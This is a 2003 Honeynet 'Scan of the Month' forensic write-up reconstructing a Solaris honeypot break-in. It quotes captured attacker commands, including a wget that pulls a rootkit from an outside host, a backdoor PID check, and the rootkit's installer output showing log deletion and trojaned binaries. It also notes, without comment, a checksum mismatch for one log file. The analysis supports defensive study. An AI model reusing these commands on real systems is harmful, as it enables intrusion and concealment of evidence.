Honeynet Scan of the Month 28
Submitter: Matthijs R. Koot (koot at cyberwar.nl)
Date: May 13, 2003
URL: http://old.honeynet.org/scans/scan28/
Rcpt: sotm at honeynet.org

The Challenge

Members of the AT&T Mexico Honeynet captured a unique attack. As common, what is interesting is not how the attackers broke in, but what they did afterwards. Your mission is to analyze the network capture of the attacker's activity and decode the attacker's actions. There are two binary log files. Day1 captured the break in, Day3 captures some unique activity following the compromise. The honeypot in question is IP 192.168.100.28. Make sure you review the challenge criteria before submitting your writeup.

Download the Binaries

day1.log.gz MD5 (day1.log.gz) = 79e5871791542c8f38dd9cee2b2bc317
day3.log.gz MD5 (day3.log.gz) = af8ab95f41530fe3561b506b422ed636

Tools used

Step by step

First, I downloaded both files:

$wget http://old.honeynet.org/scans/scan28/day1.log.gz
$wget http://old.honeynet.org/scans/scan28/day3.log.gz

Secondly, I verified the MD5 checksums (on FreeBSD md5 is used to verify the checksums, on Linux you'd have to use md5sum):

$md5 day1.log.gz
MD5 (day1.log.gz) = 8d5ea7e8dadfc1c990b7901b2cbffb41
$md5 day3.log.gz
MD5 (day3.log.gz) = af8ab95f41530fe3561b506b422ed636

...I unpacked the gzipped logs:

$gunzip day1.log.gz day3.log.gz

...I opened both binary logs in Ethereal to start analyzing the traffic.

Beginning Questions

1. What is the operating system of the honeypot? How did you determine that? (see day1)

The honeynet responded to "uname -a" with the following output, which means it ran SunOS 5.8 SPARC:

SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10

I got this result by coincidence while manually investigating the logged traffic in Ethereal.

2. How did the attacker(s) break into the system? (see day1)

He exploited 6112/TCP (dtspcd), abusing ingrelock for an interactive shell to download several tools and a rootkit.

3. Which systems were used in this attack, and how?(see day1)

62.219.90.180 - the attacker
62.211.66.16 - XOOM FTP used by the attacker to storing exploits
62.211.66.53 - XOOM webserver used by the attacker to store a rootkit
(192.168.100.28 - the compromised honeynet)

HOW the systems where used - see #4.

4. Create a diagram that demonstrates the sequences involved in the attack. (see day1)

I don't have any software available at this time to create a diagram, so I'm settling for a chronological approach.

Some CDE dtspcd vulnerability was exploited

At 17:36:25, remote host 62.219.90.180 queries 6112/TCP (dtspcd).
At 17:36:26, the host sent a payload in a successful attempt to exploit it.

Result of payload, put together

#uname -a;
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10.
#ls -l /core /var/dt/tmp/DTSPCD.log;
/core: No such file or directory.
/var/dt/tmp/DTSPCD.log: No such file or directory.

#PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;
#export PATH;

#echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`.
BD PID(s): 1773.

Attacker connects to FTP

At 17:42:42, the attacker uses the exploited ingresblock to fire up a FTP session to 62.211.66.16, which is a server of the free hosting provider XOOM:

220 services FTP server (Version XOOM FTP 1.24.3+local-release Fri Aug 28 15:52:40    PDT 1998) ready.

The attacker logs in using username "bobzz" and password "joka". He successfully downloads some files to the compromised honeynet server:

At 17:45:13, about 2-3 minutes later, the attacker disconnects the honeynet from the FTP server.

Attacker uses wget to download rootkit

The port of ingreslock was abused for an interactive shell to execute commands and at 17:45:29 a rootkit was downloaded from an Italian XOOM server:
#chmod +x solbnc wget dlp


#./wget

wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.


#./wget http://62.211.66.53/bobzz/sol.tar.gz

At 17:52:40, about 7 seconds after the first attempt to download the rootkit, a second attempt is made.

#rrrrrretar -xf sol.tar.gz.
rrrrrretar: not found
#cd sol
sol: does not exist
#./setup
./setup: not found #cd sol
sol: does not exist
#tar -xf sol.tar.gz
#cd sol
#./setup
[0;36mbobz oN ircNet on join #priv.
/\ /\ _/ \ ___| Autor: bobz |___ / \_ \ / \ / \/ \/ ******** ******** ** ** ** ** ** ** * * ******* ********** ** ** * * ******* ** ** ****** ******** ** ** ** ****** ********** ******* ** ** ** ** ** ** ******* ** ** ** ** ** ** ********** ** ** ** ** /\ /\ _/ \ ___| Autor: bobz |___ / \_ \ / \ / \/ \/ ...:::[ Autore bobz ]:::... ...:::[ On IRcnEt On Join #bobz ]:::... Ti:AmO:RosariADelete Logz ------- Deleting /var/log... /var/log/secure: No such file or directory /var/log/secure.1: No such file or directory /var/log/secure.2: No such file or directory /var/log/secure.3: No such file or directory /var/log/secure.4: No such file or directory /var/log/boot.log: No such file or directory /var/log/boot.log.1: No such file or directory /var/log/boot.log.2: No such file or directory /var/log/boot.log.3: No such file or directory /var/log/boot.log.4: No such file or directory /var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory /var/log/cron.2: No such file or directory /var/log/cron.3: No such file or directory /var/log/cron.4: No such file or directory /var/log/lastlog: No such file or directory /var/log/xferlog: No such file or directory /var/log/xferlog.1: No such file or directory /var/log/xferlog.2: No such file or directory /var/log/xferlog.3: No such file or directory /var/log/xferlog.4: No such file or directory /var/log/wtmp: No such file or directory /var/log/wtmp.1: No such file or directory /var/log/spooler: No such file or directory /var/log/spooler.1: No such file or directory /var/log/spooler.2: No such file or directory /var/log/spooler.3: No such file or directory /var/log/spooler.4: No such file or directory --- LogZ Cancellati... Delete LogZ by warning [1;37m*[0;37m Starting up at: [0;36m1038585350[0;37m
[1;37m*[0;37m Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install [1;37m*[0;37m Checking for existing rootkits... [1;37m*.[0;37m Checking for existing rootkits... [1;37m*.[0;37m checking /etc/rc2 and /etc/rc3 for rootkits... [1;37m*.[0;37m Rootkits Removed from config files
[1;37m*.[0;37m checking crond configs for rootkits... [1;37m*.[0;37m Rootkits Removed from crond config files
[1;31m*** WARNING ***
[0;37m 2 suspicious files found in /dev
[1;37m***[0;37m Insert Rootkit Password : mixer [1;37m***[0;37m Using Password mixer
[1;37m***[0;37m Insert Rootkit SSH Port :
5001
[1;37m***[0;37m Using Port 5001
[1;37m***[0;37m Insert Rootkit PsyBNC Port : 7000
[1;37m***[0;37m Using Port 7000
File processed...
[1;37m*[0;37m Making backups... su ping du passwd find ls netstat strings ps Done. [1;37m*[0;37m Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
[1;37m*[0;37m Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff
core lpset lpstat netpr arp chkperm Complete.
[1;37m*[0;37m Starting Patcher....* Patching.... DTSCD PATCHED. LPD PATCHED. fingerd.
<28>Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/dt/bin/rpc.cmsd: Killed
cmsd.
<28>Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/sbin/sadmind: Killed
ttdbserverd. sadmind. statd. rquotad. rusersd. cachefsd.
<27>Nov 29 09:56:19 inetd[1773]: [ID 801587 daemon.error] /tmp/x: No such file or directory
bindshells. snmpXdmid. Done...

Now the attacker has suited, he downloads two patches for the system to make sure nobody can hijack the comprimised system away from him:

ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip

He patches the system and installs solbnc, a psyBNC (solbnc stands for SOLaris BNC, which basically is an IRC proxy used to keep anonymous).

On day 3, the attacker applied another patch:

ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip

5. What is the purpose/reason of the ICMP packets with 'skillz' in them? (see day1)

My best gues is they're part of a DDoS setup, Stacheldraht is known to use "skillz" and "ficken" in the ICMP data field. However, a property of Stacheldraht is that it uses special, hardcoded IDs like 666. This is not the case in this SotM. If indeed DDoS is involved, it may be a Stacheldraht derival.

The honeynet does not receive any pings, it only sends ping replies; the compromised system therefore might act as an agent, beakoning to home (nocfftl.etel.hu and 61.134.3.11).

6. Following the attack, the attacker(s) enabled a unique protocol that one would not expect to find on an IPv4 network. Can you identify that protocol and why it was used? (see day3)

At 01:11:10 on day 3 the attacker enabled IPv6. This may be seen as rather unusual, although IPv6 can coexists with IPv4 in the same network. Several ICMPv6 packets sent which all had the Type field set to 131 (Group Membership Report). In addition, TCP communication had place over IPv6 to 163.162.170.173, port 6667/TCP and port 113/TCP, which looks like even more IRC. It was used to connect to an IRC server of a large Italian ISP, irc6.edisontel.it.

   USER ahaa ahaa 127.0.0.1 :-:OwnZ:-
   NICK `OwnZ``
   :irc6.edisontel.it 001 `OwnZ`` :Welcome to the Internet Relay Network `OwnZ``!~ahaa@bacardi.orange.org.ru
   :irc6.edisontel.it 002 `OwnZ`` :Your host is irc6.edisontel.it, running version 2.10.3p3+hemp
   :irc6.edisontel.it 003 `OwnZ`` :This server was created Thu Jul 4 2002 at 20:02:20 CEST
   :irc6.edisontel.it 004 `OwnZ`` irc6.edisontel.it 2.10.3p3+hemp aoOirw abeiIklmnoOpqrstv
   Line 5 : :irc6.edisontel.it 005 `OwnZ`` MAP PREFIX=(ov)@+ MODES=3 CHANTYPES=#&!+MAXCHANNELS=20 NICKLEN=9 TOPICLEN=160 KICKLEN=160 NETWORK=IRCNet CHANMODES=beI,k,l,imnpsaqr :are supported by this server 
   Line 6 : :irc6.edisontel.it 251 `OwnZ`` :There are 104308 users and 6 services on 46 servers
   Line 7 : :irc6.edisontel.it 252 `OwnZ`` 180 :operators online     
   Line 8 : :irc6.edisontel.it 253 `OwnZ`` 3 :unknown connections   
   Line 9 : :irc6.edisontel.it 254 `OwnZ`` 51164 :channels formed     
   Line 10 : :irc6.edisontel.it 255 `OwnZ`` :I have 739 users, 0 services and 1 servers
   Line 11 : :irc6.edisontel.it 265 `OwnZ`` :Current local users: 739 Max: 1163    
   Line 12 : :irc6.edisontel.it 266 `OwnZ`` :Current global users: 104308 Max: 125806
   MODE `OwnZ`` +i
   :irc6.edisontel.it 001 `OwnZ`` :Welcome to the Internet Relay Network `OwnZ``!~ahaa@host222-14.pool80117.interbusiness.it
   :irc6.edisontel.it 375 `OwnZ`` :- irc6.edisontel.it Message of the Day -
   Line 2 : :irc6.edisontel.it 372 `OwnZ`` :- 6/8/2002 17:20 
   Line 3 : :irc6.edisontel.it 372 `OwnZ`` :- 
   Line 4 : :irc6.edisontel.it 372 `OwnZ`` :- Welcome on... 
   Line 5 : :irc6.edisontel.it 372 `OwnZ`` :- 
   Line 6 : :irc6.edisontel.it 372 `OwnZ`` :- _ __ _____ _ _ _____ _ _ _ 
   Line 7 : :irc6.edisontel.it 372 `OwnZ`` :- (_)_ __ ___ / /_ | ____|__| (_)___    ___ _ _|_ _|__| | (_) |_ 
   Line 8 : :irc6.edisontel.it 372 `OwnZ`` :- | | '__/ __| '_ \ | _| / _ | / __|/    _ \| '_ \| |/ _ \ | | | __| 
   Line 9 : :irc6.edisontel.it 372 `OwnZ`` :- | | | | (__| (_) || |__| (_| | \__    \ (_) | | | | | __/ |_| | |_ 
   Line 10 : :irc6.edisontel.it 372 `OwnZ`` :- |_|_| \___|\___(_)_____\__,_|_|___/\___/|_|    |_|_|\___|_(_)_|\__| 
   Line 11 : :irc6.edisontel.it 372 `OwnZ`` :- 
   Line 12 : :irc6.edisontel.it 372 `OwnZ`` :- - IPv6 I-lines are only for italian pTLA. 
   Line 13 : :irc6.edisontel.it 372 `OwnZ`` :- We do not discuss I-lines for pTLA other than *.it 
   Line 14 : :irc6.edisontel.it 372 `OwnZ`` :- 
   Line 15 : :irc6.edisontel.it 372 `OwnZ`` :- - Port 6665 to 6669 are listening for clients. 
   Line 16 : :irc6.edisontel.it 372 `OwnZ`` :- 
   Line 17 : :irc6.edisontel.it 372 `OwnZ`` :- - IRC is mean for peaceful communication in respect 
   Line 18 : :irc6.edisontel.it 372 `OwnZ`` : 
   SETAWAY -OwnZ-
   :irc6.edisontel.it 002 `OwnZ`` :Your host is irc6.edisontel.it, running version 2.10.3p3+hemp
   :irc6.edisontel.it 003 `OwnZ`` :This server was created Thu Jul 4 2002 at 20:02:20 CEST
   :irc6.edisontel.it 004 `OwnZ`` irc6.edisontel.it 2.10.3p3+hemp aoOirw abeiIklmnoOpqrstv
   :irc6.edisontel.it 005 `OwnZ`` MAP PREFIX=(ov)@+ MODES=3 CHANTYPES=#&!+ MAXCHANNELS=20 NICKLEN=9 TOPICLEN=160 KICKLEN=160 NETWORK=IRCNet CHANMODES=beI,k,l,imnpsaqr :are supported by this server
   :irc6.edisontel.it    251 `OwnZ`` :There are 104308 users and 6 services on 46 servers
   :irc6.edisontel.it    252 `OwnZ`` 180 :operators online
   :irc6.edisontel.it 253 `OwnZ`` 3 :unknown connections
   :irc6.edisontel.it 254 `OwnZ`` 51164 :channels formed
   :irc6.edisontel.it    255 `OwnZ`` :I have 739 users, 0 services and 1 servers
   :irc6.edisontel.it    265 `OwnZ`` :Current local users: 739 Max: 1163
   :irc6.edisontel.it 266 `OwnZ``    :Current global users: 104308 Max: 125806
   :-psyBNC!psyBNC@lam3rz.de PRIVMSG    `OwnZ`` :AWAY changed to '-OwnZ-'...
   - and understanding of the other people and cultures...
   Line 2 : :irc6.edisontel.it 372 `OwnZ`` :- Please remember that all the time and have fun. 
   Line 3 : :irc6.edisontel.it 372 `OwnZ`` :- 
   Line 4 : :irc6.edisontel.it 372 
   (...)

7. Can you identify the nationality of the attacker? (see day3)

I think I was able to figure it out from the day1 packetdump. The exploit code ("ipv6sun") looks rather Italian: Inserisci il tuo ipv4. The attacker - who calls himself "bob", "bobz" or "bobbino" - was connected through an Italian ISP while attack the honeypot. On day 3, the attacker connects to an IRC server of an Italian ISP to perform some DDoS related tasks and to chat, in Italian, with (among others) someone named "_-PaKi-_" and someone named "RiValD|n0". From all this I would say it is likely that the attacker is from Italian origin.

Notes

I'm a little short of time and this write-up isn't as thorough and detailled as it is rightfully supposed to be. However, these challenges are just too much fun :-)

I'll hope to do a better write-up in SotM29!

SotM28, Matthijs Koot